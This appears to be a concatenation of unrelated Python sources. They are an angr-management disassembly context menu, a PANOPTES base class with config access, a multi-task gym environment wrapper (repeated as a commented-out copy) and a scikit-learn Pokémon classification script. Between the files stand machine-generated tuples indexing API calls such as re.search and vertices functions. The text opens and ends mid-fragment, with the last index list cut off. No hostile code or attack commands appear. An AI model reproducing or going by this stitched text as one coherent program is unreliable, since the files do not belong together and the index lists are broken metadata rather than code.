] | [((5454, 5517), 're.search', 're.search', (['"""%FSLAX([1-6])([3-6])Y([1-6])([3-6])\\\\*%"""', 'statement'], {}), "('%FSLAX([1-6])([3-6])Y([1-6])([3-6])\\\\*%', statement)\n", (5463, 5517), False, 'import re\n'), ((7133, 7212), 're.search', 're.search', (['f"""(X{RE_INT})?(Y{RE_INT})?(I{RE_INT})?(J{RE_INT})?D01\\\\*"""', 'statement'], {}), "(f'(X{RE_INT})?(Y{RE_INT})?(I{RE_INT})?(J{RE_INT})?D01\\\\*', statement)\n", (7142, 7212), False, 'import re\n'), ((8441, 8496), 're.search', 're.search', (['f"""(X{RE_INT})?(Y{RE_INT})?D02\\\\*"""', 'statement'], {}), "(f'(X{RE_INT})?(Y{RE_INT})?D02\\\\*', statement)\n", (8450, 8496), False, 'import re\n'), ((8833, 8888), 're.search', 're.search', (['f"""(X{RE_INT})?(Y{RE_INT})?D03\\\\*"""', 'statement'], {}), "(f'(X{RE_INT})?(Y{RE_INT})?D03\\\\*', statement)\n", (8842, 8888), False, 'import re\n'), ((9723, 9764), 're.search', 're.search', (['"""%LM(N|X|Y|XY)\\\\*%"""', 'statement'], {}), "('%LM(N|X|Y|XY)\\\\*%', statement)\n", (9732, 9764), False, 'import re\n'), ((10051, 10088), 're.search', 're.search', (['"""%LR(\\\\S+)\\\\*%"""', 'statement'], {}), "('%LR(\\\\S+)\\\\*%', statement)\n", (10060, 10088), False, 'import re\n'), ((10373, 10410), 're.search', 're.search', (['"""%LS(\\\\S+)\\\\*%"""', 'statement'], {}), "('%LS(\\\\S+)\\\\*%', statement)\n", (10382, 10410), False, 'import re\n'), ((10748, 10813), 're.search', 're.search', (['"""%AD(D[0-9]{2,})([\\\\w\\\\.\\\\$]+)(,\\\\S*)?\\\\*%"""', 'statement'], {}), "('%AD(D[0-9]{2,})([\\\\w\\\\.\\\\$]+)(,\\\\S*)?\\\\*%', statement)\n", (10757, 10813), False, 'import re\n'), ((11588, 11629), 're.search', 're.search', (['"""%AM([\\\\w\\\\.\\\\$]+)"""', 'statement'], {}), "('%AM([\\\\w\\\\.\\\\$]+)', statement)\n", (11597, 11629), False, 'import re\n'), ((12223, 12267), 're.search', 're.search', (['"""%AB(D[0-9]{2,})?\\\\*%"""', 'statement'], {}), "('%AB(D[0-9]{2,})?\\\\*%', statement)\n", (12232, 12267), False, 'import re\n'), ((12916, 12955), 're.search', 're.search', (['"""(D[0-9]{2,})\\\\*"""', 'statement'], {}), "('(D[0-9]{2,})\\\\*', statement)\n", (12925, 12955), False, 'import re\n'), ((14706, 14721), 'copy.copy', 'copy.copy', (['self'], {}), '(self)\n', (14715, 14721), False, 'import copy\n'), ((15419, 15449), 'vertices.circle', 'vertices.circle', (['self.diameter'], {}), '(self.diameter)\n', (15434, 15449), False, 'import vertices\n'), ((15525, 15561), 'vertices.OutlineVertices', 'vertices.OutlineVertices', (['pts', 'holes'], {}), '(pts, holes)\n', (15549, 15561), False, 'import vertices\n'), ((15965, 16009), 'vertices.rectangle', 'vertices.rectangle', (['self.x_size', 'self.y_size'], {}), '(self.x_size, self.y_size)\n', (15983, 16009), False, 'import vertices\n'), ((16085, 16121), 'vertices.OutlineVertices', 'vertices.OutlineVertices', (['pts', 'holes'], {}), '(pts, holes)\n', (16109, 16121), False, 'import vertices\n'), ((16777, 16817), 'vertices.rounded_line', 'vertices.rounded_line', (['w', 'x1', 'y1', 'x2', 'y2'], {}), '(w, x1, y1, x2, y2)\n', (16798, 16817), False, 'import vertices\n'), ((16893, 16929), 'vertices.OutlineVertices', 'vertices.OutlineVertices', (['pts', 'holes'], {}), '(pts, holes)\n', (16917, 16929), False, 'import vertices\n'), ((17536, 17593), 'vertices.regular_poly', 'vertices.regular_poly', (['self.outer_diameter', 'self.vertices'], {}), '(self.outer_diameter, self.vertices)\n', (17557, 17593), False, 'import vertices\n'), ((17602, 17637), 'vertices.rotate', 'vertices.rotate', (['pts', 'self.rotation'], {}), '(pts, self.rotation)\n', (17617, 17637), False, 'import vertices\n'), ((17713, 17749), 'vertices.OutlineVertices', 'vertices.OutlineVertices', (['pts', 'holes'], {}), '(pts, holes)\n', (17737, 17749), False, 'import vertices\n'), ((21675, 21705), 'vertices.circle', 'vertices.circle', (['self.diameter'], {}), '(self.diameter)\n', (21690, 21705), False, 'import vertices\n'), ((21724, 21753), 'vertices.OutlineVertices', 'vertices.OutlineVertices', (['pts'], {}), '(pts)\n', (21748, 21753), False, 'import vertices\n'), ((22300, 22367), 'vertices.thick_line', 'vertices.thick_line', (['self.width', 'self.x1', 'self.y1', 'self.x2', 'self.y2'], {}), '(self.width, self.x1, self.y1, self.x2, self.y2)\n', (22319, 22367), False, 'import vertices\n'), ((22454, 22483), 'vertices.OutlineVertices', 'vertices.OutlineVertices', (['pts'], {}), '(pts)\n', (22478, 22483), False, 'import vertices\n'), ((22973, 23016), 'vertices.rectangle', 'vertices.rectangle', (['self.width', 'self.height'], {}), '(self.width, self.height)\n', (22991, 23016), False, 'import vertices\n'), ((23035, 23064), 'vertices.OutlineVertices', 'vertices.OutlineVertices', (['pts'], {}), '(pts)\n', (23059, 23064), False, 'import vertices\n'), ((23566, 23617), 'vertices.regular_poly', 'vertices.regular_poly', (['self.diameter', 'self.vertices'], {}), '(self.diameter, self.vertices)\n', (23587, 23617), False, 'import vertices\n'), ((23636, 23665), 'vertices.OutlineVertices', 'vertices.OutlineVertices', (['pts'], {}), '(pts)\n', (23660, 23665), False, 'import vertices\n'), ((24241, 24277), 'vertices.circle', 'vertices.circle', (['self.outer_diameter'], {}), '(self.outer_diameter)\n', (24256, 24277), False, 'import vertices\n'), ((24297, 24333), 'vertices.circle', 'vertices.circle', (['self.inner_diameter'], {}), '(self.inner_diameter)\n', (24312, 24333), False, 'import vertices\n'), ((24415, 24451), 'vertices.OutlineVertices', 'vertices.OutlineVertices', (['pts', 'holes'], {}), '(pts, holes)\n', (24439, 24451), False, 'import vertices\n'), ((25231, 25267), 'vertices.circle', 'vertices.circle', (['self.outer_diameter'], {}), '(self.outer_diameter)\n', (25246, 25267), False, 'import vertices\n'), ((25375, 25411), 'vertices.OutlineVertices', 'vertices.OutlineVertices', (['pts', 'holes'], {}), '(pts, holes)\n', (25399, 25411), False, 'import vertices\n'), ((26126, 26152), 'numpy.array', 'np.array', (['self.coordinates'], {}), '(self.coordinates)\n', (26134, 26152), True, 'import numpy as np\n'), ((26198, 26227), 'vertices.OutlineVertices', 'vertices.OutlineVertices', (['pts'], {}), '(pts)\n', (26222, 26227), False, 'import vertices\n'), ((26719, 26739), 'copy.copy', 'copy.copy', (['transform'], {}), '(transform)\n', (26728, 26739), False, 'import copy\n'), ((27625, 27686), 'vertices.rounded_line', 'vertices.rounded_line', (['self.aperture.diameter', 'x0', 'y0', 'x1', 'y1'], {}), '(self.aperture.diameter, x0, y0, x1, y1)\n', (27646, 27686), False, 'import vertices\n'), ((27705, 27734), 'vertices.OutlineVertices', 'vertices.OutlineVertices', (['pts'], {}), '(pts)\n', (27729, 27734), False, 'import vertices\n'), ((28655, 28723), 'vertices.rounded_arc', 'vertices.rounded_arc', (['self.aperture.diameter', 'x0', 'y0', 'x1', 'y1', 'x2', 'y2'], {}), '(self.aperture.diameter, x0, y0, x1, y1, x2, y2)\n', (28675, 28723), False, 'import vertices\n'), ((28732, 28763), 'vertices.translate', 'vertices.translate', (['pts', 'x0', 'y0'], {}), '(pts, x0, y0)\n', (28750, 28763), False, 'import vertices\n'), ((28782, 28811), 'vertices.OutlineVertices', 'vertices.OutlineVertices', (['pts'], {}), '(pts)\n', (28806, 28811), False, 'import vertices\n'), ((3279, 3316), 're.search', 're.search', (['"""[GDM](\\\\d\\\\d)"""', 'statement'], {}), "('[GDM](\\\\d\\\\d)', statement)\n", (3288, 3316), False, 'import re\n'), ((13561, 13629), 're.search', 're.search', (['f"""%SRX(\\\\d+)Y(\\\\d+)I({RE_DEC})J({RE_DEC})\\\\*%"""', 'statement'], {}), "(f'%SRX(\\\\d+)Y(\\\\d+)I({RE_DEC})J({RE_DEC})\\\\*%', statement)\n", (13570, 13629), False, 'import re\n'), ((14872, 14907), 'vertices.circle', 'vertices.circle', (['self.hole_diameter'], {}), '(self.hole_diameter)\n', (14887, 14907), False, 'import vertices\n'), ((14931, 14951), 'numpy.flip', 'np.flip', (['hole_pts', '(0)'], {}), '(hole_pts, 0)\n', (14938, 14951), True, 'import numpy as np\n'), ((24351, 24371), 'numpy.flip', 'np.flip', (['hole_pts', '(0)'], {}), '(hole_pts, 0)\n', (24358, 24371), True, 'import numpy as np\n'), ((25285, 25321), 'vertices.circle', 'vertices.circle', (['self.inner_diameter'], {}), '(self.inner_diameter)\n', (25300, 25321), False, 'import vertices\n'), ((27540, 27561), 'numpy.array', 'np.array', (['self.origin'], {}), '(self.origin)\n', (27548, 27561), True, 'import numpy as np\n'), ((27587, 27610), 'numpy.array', 'np.array', (['self.endpoint'], {}), '(self.endpoint)\n', (27595, 27610), True, 'import numpy as np\n'), ((28489, 28510), 'numpy.array', 'np.array', (['self.offset'], {}), '(self.offset)\n', (28497, 28510), True, 'import numpy as np\n'), ((28536, 28557), 'numpy.array', 'np.array', (['self.origin'], {}), '(self.origin)\n', (28544, 28557), True, 'import numpy as np\n'), ((28583, 28606), 'numpy.array', 'np.array', (['self.endpoint'], {}), '(self.endpoint)\n', (28591, 28606), True, 'import numpy as np\n'), ((29287, 29308), 'numpy.array', 'np.array', (['self.origin'], {}), '(self.origin)\n', (29295, 29308), True, 'import numpy as np\n'), ((18877, 18919), 're.search', 're.search', (['"""\\\\$(\\\\d+)\\\\s*=([^*]+)*"""', 'block'], {}), "('\\\\$(\\\\d+)\\\\s*=([^*]+)*', block)\n", (18886, 18919), False, 'import re\n'), ((19398, 19425), 're.search', 're.search', (['"""\\\\$\\\\d+"""', 'block'], {}), "('\\\\$\\\\d+', block)\n", (19407, 19425), False, 'import re\n')] |
from functools import partial
from typing import Callable
from typing import TYPE_CHECKING
from ...config import Conf
from .menu import Menu, MenuEntry, MenuSeparator
if TYPE_CHECKING:
from ...ui.views.disassembly_view import DisassemblyView
class DisasmInsnContextMenu(Menu):
"""
Dissembly Instruction's Context Menu Items and callback funcion.
It provides context menu for dissembly instructions in the Dissembly View.
For adding items in plugins, use `Workspace.add_disasm_insn_ctx_menu_entry`
and `Workspace.remove_disasm_insn_ctx_menu_entry`.
"""
def __init__(self, disasm_view: 'DisassemblyView'):
super().__init__("", parent=disasm_view)
self.insn_addr = None
self.entries.extend([
MenuEntry('T&oggle selection', self._toggle_instruction_selection),
MenuSeparator(),
MenuEntry('&XRefs...', self._popup_xrefs),
MenuSeparator(),
])
if Conf.has_operation_mango:
self.entries.extend([
MenuEntry("&Depends on...", self._popup_dependson_dialog),
MenuSeparator(),
])
self.entries.extend([
MenuEntry('E&xecute symbolically...', self._popup_newstate_dialog),
MenuEntry('&Avoid in execution...', self._avoid_in_execution),
MenuEntry('&Find in execution...', self._find_in_execution),
MenuEntry('Add &hook...', self._add_hook),
MenuEntry('View function &documentation...', self._view_docs)
])
@property
def _disasm_view(self) -> 'DisassemblyView':
return self.parent
def _popup_newstate_dialog(self):
self._disasm_view.popup_newstate_dialog(async_=True)
def _popup_dependson_dialog(self):
self._disasm_view.popup_dependson_dialog(use_operand=True)
def _toggle_instruction_selection(self):
self._disasm_view.infodock.toggle_instruction_selection(self.insn_addr)
def _avoid_in_execution(self):
self._disasm_view.avoid_addr_in_exec(self.insn_addr)
self._disasm_view.refresh()
def _find_in_execution(self):
self._disasm_view.find_addr_in_exec(self.insn_addr)
self._disasm_view.refresh()
def _add_hook(self):
self._disasm_view.popup_hook_dialog(async_=True)
def _view_docs(self):
if self._disasm_view is None:
return
addr = self._disasm_view._address_in_selection()
if addr is not None:
self._disasm_view.popup_func_doc_dialog(addr)
def _popup_xrefs(self):
if self._disasm_view is None or self._disasm_view._flow_graph is None:
return
r = self._disasm_view._flow_graph.get_selected_operand_info()
if r is not None:
_, ins_addr, operand = r
self._disasm_view.parse_operand_and_popup_xref_dialog(ins_addr, operand, async_=True)
#
# Public Methods
#
def add_menu_entry(self, text, callback: Callable[['DisasmInsnContextMenu'], None], add_separator_first=True):
if add_separator_first:
self.entries.append(MenuSeparator())
self.entries.append(MenuEntry(text, partial(callback, self)))
def remove_menu_entry(self, text, remove_preceding_separator=True):
for idx, m in enumerate(self.entries):
if not isinstance(m, MenuEntry):
continue
if m.caption == text:
self.entries.remove(m)
if remove_preceding_separator:
self.entries.pop(idx-1)
| [
"functools.partial"
] | [((3178, 3201), 'functools.partial', 'partial', (['callback', 'self'], {}), '(callback, self)\n', (3185, 3201), False, 'from functools import partial\n')] |
from requests.exceptions import ConnectionError
from panoptes.pocs import __version__
from panoptes.utils.database import PanDB
from panoptes.utils.config import client
from panoptes.pocs.utils.logger import get_logger
from panoptes.pocs import hardware
# Global database.
PAN_DB_OBJ = None
class PanBase(object):
""" Base class for other classes within the PANOPTES ecosystem
Defines common properties for each class (e.g. logger, config, db).
"""
def __init__(self, config_port='6563', *args, **kwargs):
self.__version__ = __version__
self._config_port = config_port
self.logger = get_logger()
# If the user requests a db_type then update runtime config
db_type = kwargs.get('db_type', self.get_config('db.type', default='file'))
db_name = kwargs.get('db_name', self.get_config('db.name', default='panoptes'))
global PAN_DB_OBJ
if PAN_DB_OBJ is None:
PAN_DB_OBJ = PanDB(db_type=db_type, db_name=db_name)
self.db = PAN_DB_OBJ
def get_config(self, *args, **kwargs):
"""Thin-wrapper around client based get_config that sets default port.
See `panoptes.utils.config.client.get_config` for more information.
Args:
*args: Passed to get_config
**kwargs: Passed to get_config
"""
config_value = None
try:
config_value = client.get_config(port=self._config_port, *args, **kwargs)
except ConnectionError as e: # pragma: no cover
self.logger.critical(f'Cannot connect to config_server from {self.__class__}: {e!r}')
return config_value
def set_config(self, key, new_value, *args, **kwargs):
"""Thin-wrapper around client based set_config that sets default port.
See `panoptes.utils.config.client.set_config` for more information.
Args:
key (str): The key name to use, can be namespaced with dots.
new_value (any): The value to store.
*args: Passed to set_config
**kwargs: Passed to set_config
"""
config_value = None
if key == 'simulator' and new_value == 'all':
# Don't use hardware.get_simulator_names because it checks config.
new_value = hardware.ALL_NAMES
try:
self.logger.trace(f'Setting config {key=} {new_value=}')
config_value = client.set_config(key, new_value, port=self._config_port, *args,
**kwargs)
self.logger.trace(f'Config set {config_value=}')
except ConnectionError as e: # pragma: no cover
self.logger.critical(f'Cannot connect to config_server from {self.__class__}: {e!r}')
return config_value
| [
"panoptes.utils.config.client.get_config",
"panoptes.utils.database.PanDB",
"panoptes.utils.config.client.set_config",
"panoptes.pocs.utils.logger.get_logger"
] | [((631, 643), 'panoptes.pocs.utils.logger.get_logger', 'get_logger', ([], {}), '()\n', (641, 643), False, 'from panoptes.pocs.utils.logger import get_logger\n'), ((968, 1007), 'panoptes.utils.database.PanDB', 'PanDB', ([], {'db_type': 'db_type', 'db_name': 'db_name'}), '(db_type=db_type, db_name=db_name)\n', (973, 1007), False, 'from panoptes.utils.database import PanDB\n'), ((1416, 1474), 'panoptes.utils.config.client.get_config', 'client.get_config', (['*args'], {'port': 'self._config_port'}), '(*args, port=self._config_port, **kwargs)\n', (1433, 1474), False, 'from panoptes.utils.config import client\n'), ((2422, 2496), 'panoptes.utils.config.client.set_config', 'client.set_config', (['key', 'new_value', '*args'], {'port': 'self._config_port'}), '(key, new_value, *args, port=self._config_port, **kwargs)\n', (2439, 2496), False, 'from panoptes.utils.config import client\n')] |
"""A wrapper env that handles multiple tasks from different envs.
Useful while training multi-task reinforcement learning algorithms.
It provides observations augmented with one-hot representation of tasks.
"""
import random
import akro
import gym
import numpy as np
def round_robin_strategy(num_tasks, last_task=None):
"""A function for sampling tasks in round robin fashion.
Args:
num_tasks (int): Total number of tasks.
last_task (int): Previously sampled task.
Returns:
int: task id.
"""
if last_task is None:
return 0
return (last_task + 1) % num_tasks
def uniform_random_strategy(num_tasks, _):
"""A function for sampling tasks uniformly at random.
Args:
num_tasks (int): Total number of tasks.
_ (object): Ignored by this sampling strategy.
Returns:
int: task id.
"""
return random.randint(0, num_tasks - 1)
class MultiEnvWrapper(gym.Wrapper):
"""A wrapper class to handle multiple gym environments.
Args:
envs (list(gym.Env)):
A list of objects implementing gym.Env.
sample_strategy (function(int, int)):
Sample strategy to be used when sampling a new task.
"""
def __init__(self, envs, task_name=None, sample_strategy=uniform_random_strategy):
self._sample_strategy = sample_strategy
self._num_tasks = len(envs)
self._active_task_index = None
self._observation_space = None
self._envs_names_list = task_name or dict()
max_flat_dim = np.prod(envs[0].observation_space.shape)
for i, env in enumerate(envs):
assert len(env.observation_space.shape) == 1
if np.prod(env.observation_space.shape) >= max_flat_dim:
self.max_observation_space_index = i
max_flat_dim = np.prod(env.observation_space.shape)
self._max_plain_dim = max_flat_dim
super().__init__(envs[self.max_observation_space_index])
self._task_envs = []
for env in envs:
if env.action_space.shape != self.env.action_space.shape:
raise ValueError('Action space of all envs should be same.')
self._task_envs.append(env)
self.spec.observation_space = self.observation_space
@property
def num_tasks(self):
"""Total number of tasks.
Returns:
int: number of tasks.
"""
return len(self._task_envs)
@property
def task_space(self):
"""Task Space.
Returns:
akro.Box: Task space.
"""
one_hot_ub = np.ones(self.num_tasks)
one_hot_lb = np.zeros(self.num_tasks)
return akro.Box(one_hot_lb, one_hot_ub)
@property
def active_task_index(self):
"""Index of active task env.
Returns:
int: Index of active task.
"""
return self._active_task_index
@property
def observation_space(self):
"""Observation space.
Returns:
akro.Box: Observation space.
"""
task_lb, task_ub = self.task_space.bounds
env_lb, env_ub = self._observation_space.bounds
return akro.Box(np.concatenate([task_lb, env_lb]),
np.concatenate([task_ub, env_ub]))
@observation_space.setter
def observation_space(self, observation_space):
"""Observation space setter.
Args:
observation_space (akro.Box): Observation space.
"""
self._observation_space = observation_space
@property
def active_task_one_hot(self):
"""One-hot representation of active task.
Returns:
numpy.ndarray: one-hot representation of active task
"""
one_hot = np.zeros(self.task_space.shape)
index = self.active_task_index or 0
one_hot[index] = self.task_space.high[index]
return one_hot
def reset(self, **kwargs):
"""Sample new task and call reset on new task env.
Args:
kwargs (dict): Keyword arguments to be passed to gym.Env.reset
Returns:
numpy.ndarray: active task one-hot representation + observation
"""
self._active_task_index = self._sample_strategy(
self._num_tasks, self._active_task_index)
self.env = self._task_envs[self._active_task_index]
obs = self.env.reset(**kwargs)
obs = self._augment_observation(obs)
oh_obs = self._obs_with_one_hot(obs)
return oh_obs
def _augment_observation(self, obs):
# optionally zero-pad observation
if np.prod(obs.shape) < self._max_plain_dim:
zeros = np.zeros(
shape=(self._max_plain_dim - np.prod(obs.shape),)
)
obs = np.concatenate([obs, zeros])
return obs
def step(self, action):
"""gym.Env step for the active task env.
Args:
action (object): object to be passed in gym.Env.reset(action)
Returns:
object: agent's observation of the current environment
float: amount of reward returned after previous action
bool: whether the episode has ended
dict: contains auxiliary diagnostic information
"""
obs, reward, done, info = self.env.step(action)
obs = self._augment_observation(obs)
oh_obs = self._obs_with_one_hot(obs)
info['task_id'] = self._active_task_index
info['task_name'] = self._envs_names_list[self._active_task_index]
return oh_obs, reward, done, info
def close(self):
"""Close all task envs."""
for env in self._task_envs:
env.close()
def _obs_with_one_hot(self, obs):
"""Concatenate active task one-hot representation with observation.
Args:
obs (numpy.ndarray): observation
Returns:
numpy.ndarray: active task one-hot + observation
"""
oh_obs = np.concatenate([self.active_task_one_hot, obs])
return oh_obs
# """A wrapper env that handles multiple tasks from different envs.
# Useful while training multi-task reinforcement learning algorithms.
# It provides observations augmented with one-hot representation of tasks.
# """
# import random
# import akro
# import gym
# import numpy as np
# def round_robin_strategy(num_tasks, last_task=None):
# """A function for sampling tasks in round robin fashion.
# Args:
# num_tasks (int): Total number of tasks.
# last_task (int): Previously sampled task.
# Returns:
# int: task id.
# """
# if last_task is None:
# return 0
# return (last_task + 1) % num_tasks
# def uniform_random_strategy(num_tasks, _):
# """A function for sampling tasks uniformly at random.
# Args:
# num_tasks (int): Total number of tasks.
# _ (object): Ignored by this sampling strategy.
# Returns:
# int: task id.
# """
# return random.randint(0, num_tasks - 1)
# class MultiEnvWrapper(gym.Wrapper):
# """A wrapper class to handle multiple gym environments.
# Args:
# envs (list(gym.Env)):
# A list of objects implementing gym.Env.
# sample_strategy (function(int, int)):
# Sample strategy to be used when sampling a new task.
# """
# def __init__(self, envs, sample_strategy=uniform_random_strategy):
# self._sample_strategy = sample_strategy
# self._num_tasks = len(envs)
# self._active_task_index = None
# self._observation_space = None
# max_flat_dim = np.prod(envs[0].observation_space.shape)
# max_observation_space_index = 0
# for i, env in enumerate(envs):
# assert len(env.observation_space.shape) == 1
# if np.prod(env.observation_space.shape) >= max_flat_dim:
# self.max_observation_space_index = i
# max_flat_dim = np.prod(env.observation_space.shape)
# self._max_plain_dim = max_flat_dim
# super().__init__(envs[self.max_observation_space_index])
# self._task_envs = []
# for i, env in enumerate(envs):
# if env.action_space.shape != self.env.action_space.shape:
# raise ValueError('Action space of all envs should be same.')
# self._task_envs.append(env)
# self.env.spec.observation_space = self._task_envs[self.max_observation_space_index].observation_space
# @property
# def num_tasks(self):
# """Total number of tasks.
# Returns:
# int: number of tasks.
# """
# return len(self._task_envs)
# @property
# def task_space(self):
# """Task Space.
# Returns:
# akro.Box: Task space.
# """
# one_hot_ub = np.ones(self.num_tasks)
# one_hot_lb = np.zeros(self.num_tasks)
# return akro.Box(one_hot_lb, one_hot_ub)
# @property
# def active_task_index(self):
# """Index of active task env.
# Returns:
# int: Index of active task.
# """
# return self._active_task_index
# @property
# def observation_space(self):
# """Observation space.
# Returns:
# akro.Box: Observation space.
# """
# task_lb, task_ub = self.task_space.bounds
# env_lb, env_ub = self._observation_space.bounds
# return akro.Box(np.concatenate([task_lb, env_lb]),
# np.concatenate([task_ub, env_ub]))
# @observation_space.setter
# def observation_space(self, observation_space):
# """Observation space setter.
# Args:
# observation_space (akro.Box): Observation space.
# """
# self._observation_space = observation_space
# @property
# def active_task_one_hot(self):
# """One-hot representation of active task.
# Returns:
# numpy.ndarray: one-hot representation of active task
# """
# one_hot = np.zeros(self.task_space.shape)
# index = self.active_task_index or 0
# one_hot[index] = self.task_space.high[index]
# return one_hot
# def reset(self, **kwargs):
# """Sample new task and call reset on new task env.
# Args:
# kwargs (dict): Keyword arguments to be passed to gym.Env.reset
# Returns:
# numpy.ndarray: active task one-hot representation + observation
# """
# self._active_task_index = self._sample_strategy(
# self._num_tasks, self._active_task_index)
# self.env = self._task_envs[self._active_task_index]
# obs = self.env.reset(**kwargs)
# obs = self._augment_observation(obs)
# oh_obs = self._obs_with_one_hot(obs)
# return oh_obs
# def step(self, action):
# """gym.Env step for the active task env.
# Args:
# action (object): object to be passed in gym.Env.reset(action)
# Returns:
# object: agent's observation of the current environment
# float: amount of reward returned after previous action
# bool: whether the episode has ended
# dict: contains auxiliary diagnostic information
# """
# obs, reward, done, info = self.env.step(action)
# obs = self._augment_observation(obs)
# oh_obs = self._obs_with_one_hot(obs)
# info['task_id'] = self._active_task_index
# return oh_obs, reward, done, info
# def _augment_observation(self, obs):
# # optionally zero-pad observation
# if np.prod(obs.shape) < self._max_plain_dim:
# zeros = np.zeros(
# shape=(self._max_plain_dim - np.prod(obs.shape),)
# )
# obs = np.concatenate([obs, zeros])
# return obs
# def close(self):
# """Close all task envs."""
# for env in self._task_envs:
# env.close()
# def _obs_with_one_hot(self, obs):
# """Concatenate active task one-hot representation with observation.
# Args:
# obs (numpy.ndarray): observation
# Returns:
# numpy.ndarray: active task one-hot + observation
# """
# oh_obs = np.concatenate([self.active_task_one_hot, obs])
# return oh_obs
| [
"numpy.prod",
"numpy.ones",
"numpy.zeros",
"numpy.concatenate",
"akro.Box",
"random.randint"
] | [((896, 928), 'random.randint', 'random.randint', (['(0)', '(num_tasks - 1)'], {}), '(0, num_tasks - 1)\n', (910, 928), False, 'import random\n'), ((1566, 1606), 'numpy.prod', 'np.prod', (['envs[0].observation_space.shape'], {}), '(envs[0].observation_space.shape)\n', (1573, 1606), True, 'import numpy as np\n'), ((2630, 2653), 'numpy.ones', 'np.ones', (['self.num_tasks'], {}), '(self.num_tasks)\n', (2637, 2653), True, 'import numpy as np\n'), ((2675, 2699), 'numpy.zeros', 'np.zeros', (['self.num_tasks'], {}), '(self.num_tasks)\n', (2683, 2699), True, 'import numpy as np\n'), ((2715, 2747), 'akro.Box', 'akro.Box', (['one_hot_lb', 'one_hot_ub'], {}), '(one_hot_lb, one_hot_ub)\n', (2723, 2747), False, 'import akro\n'), ((3791, 3822), 'numpy.zeros', 'np.zeros', (['self.task_space.shape'], {}), '(self.task_space.shape)\n', (3799, 3822), True, 'import numpy as np\n'), ((6021, 6068), 'numpy.concatenate', 'np.concatenate', (['[self.active_task_one_hot, obs]'], {}), '([self.active_task_one_hot, obs])\n', (6035, 6068), True, 'import numpy as np\n'), ((3222, 3255), 'numpy.concatenate', 'np.concatenate', (['[task_lb, env_lb]'], {}), '([task_lb, env_lb])\n', (3236, 3255), True, 'import numpy as np\n'), ((3281, 3314), 'numpy.concatenate', 'np.concatenate', (['[task_ub, env_ub]'], {}), '([task_ub, env_ub])\n', (3295, 3314), True, 'import numpy as np\n'), ((4649, 4667), 'numpy.prod', 'np.prod', (['obs.shape'], {}), '(obs.shape)\n', (4656, 4667), True, 'import numpy as np\n'), ((4819, 4847), 'numpy.concatenate', 'np.concatenate', (['[obs, zeros]'], {}), '([obs, zeros])\n', (4833, 4847), True, 'import numpy as np\n'), ((1718, 1754), 'numpy.prod', 'np.prod', (['env.observation_space.shape'], {}), '(env.observation_space.shape)\n', (1725, 1754), True, 'import numpy as np\n'), ((1856, 1892), 'numpy.prod', 'np.prod', (['env.observation_space.shape'], {}), '(env.observation_space.shape)\n', (1863, 1892), True, 'import numpy as np\n'), ((4766, 4784), 'numpy.prod', 'np.prod', (['obs.shape'], {}), '(obs.shape)\n', (4773, 4784), True, 'import numpy as np\n')] |
import numpy as np
import pandas as pd
import warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
from sklearn.model_selection import train_test_split, cross_validate
from sklearn.preprocessing import OneHotEncoder, StandardScaler, OrdinalEncoder
from sklearn.impute import SimpleImputer
from sklearn.compose import ColumnTransformer, make_column_transformer
from sklearn.pipeline import Pipeline, make_pipeline
from sklearn.svm import SVC
# Loading in the data
pk_df = pd.read_csv('data/pokemon.csv')
train_df, test_df = train_test_split(pk_df, test_size=0.2, random_state=1)
X_train = train_df.drop(columns=['legendary'])
y_train = train_df['legendary']
X_test = test_df.drop(columns=['legendary'])
y_test = test_df['legendary']
numeric_features = ["deck_no",
"attack",
"defense" ,
"sp_attack",
"sp_defense",
"speed",
"capture_rt",
"total_bs"]
categorical_features = ["type"]
numeric_transformer = make_pipeline(SimpleImputer(strategy="median"), StandardScaler())
categorical_transformer = make_pipeline(
SimpleImputer(strategy="most_frequent"),
OneHotEncoder(handle_unknown="ignore"))
preprocessor = make_column_transformer(
(numeric_transformer, numeric_features),
(categorical_transformer, categorical_features))
# Build a pipeline containing the column transformer and an SVC model
# Use the parameter class_weight="balanced"
# Name this pipeline main_pipe
main_pipe = make_pipeline(preprocessor, SVC(class_weight="balanced"))
# Perform cross validation on the training split using the scoring measures accuracy, precision and recall
# Save the results in a dataframe named multi_scores
multi_scores = pd.DataFrame(cross_validate(main_pipe,
X_train,
y_train,
return_train_score=True,
scoring = ['accuracy', 'precision', 'recall']))
multi_scores
| [
"pandas.read_csv",
"sklearn.model_selection.train_test_split",
"sklearn.preprocessing.OneHotEncoder",
"sklearn.model_selection.cross_validate",
"sklearn.compose.make_column_transformer",
"sklearn.preprocessing.StandardScaler",
"sklearn.impute.SimpleImputer",
"warnings.simplefilter",
"sklearn.svm.SVC... | [((55, 117), 'warnings.simplefilter', 'warnings.simplefilter', ([], {'action': '"""ignore"""', 'category': 'FutureWarning'}), "(action='ignore', category=FutureWarning)\n", (76, 117), False, 'import warnings\n'), ((491, 522), 'pandas.read_csv', 'pd.read_csv', (['"""data/pokemon.csv"""'], {}), "('data/pokemon.csv')\n", (502, 522), True, 'import pandas as pd\n'), ((544, 598), 'sklearn.model_selection.train_test_split', 'train_test_split', (['pk_df'], {'test_size': '(0.2)', 'random_state': '(1)'}), '(pk_df, test_size=0.2, random_state=1)\n', (560, 598), False, 'from sklearn.model_selection import train_test_split, cross_validate\n'), ((1281, 1399), 'sklearn.compose.make_column_transformer', 'make_column_transformer', (['(numeric_transformer, numeric_features)', '(categorical_transformer, categorical_features)'], {}), '((numeric_transformer, numeric_features), (\n categorical_transformer, categorical_features))\n', (1304, 1399), False, 'from sklearn.compose import ColumnTransformer, make_column_transformer\n'), ((1082, 1114), 'sklearn.impute.SimpleImputer', 'SimpleImputer', ([], {'strategy': '"""median"""'}), "(strategy='median')\n", (1095, 1114), False, 'from sklearn.impute import SimpleImputer\n'), ((1116, 1132), 'sklearn.preprocessing.StandardScaler', 'StandardScaler', ([], {}), '()\n', (1130, 1132), False, 'from sklearn.preprocessing import OneHotEncoder, StandardScaler, OrdinalEncoder\n'), ((1180, 1219), 'sklearn.impute.SimpleImputer', 'SimpleImputer', ([], {'strategy': '"""most_frequent"""'}), "(strategy='most_frequent')\n", (1193, 1219), False, 'from sklearn.impute import SimpleImputer\n'), ((1225, 1263), 'sklearn.preprocessing.OneHotEncoder', 'OneHotEncoder', ([], {'handle_unknown': '"""ignore"""'}), "(handle_unknown='ignore')\n", (1238, 1263), False, 'from sklearn.preprocessing import OneHotEncoder, StandardScaler, OrdinalEncoder\n'), ((1591, 1619), 'sklearn.svm.SVC', 'SVC', ([], {'class_weight': '"""balanced"""'}), "(class_weight='balanced')\n", (1594, 1619), False, 'from sklearn.svm import SVC\n'), 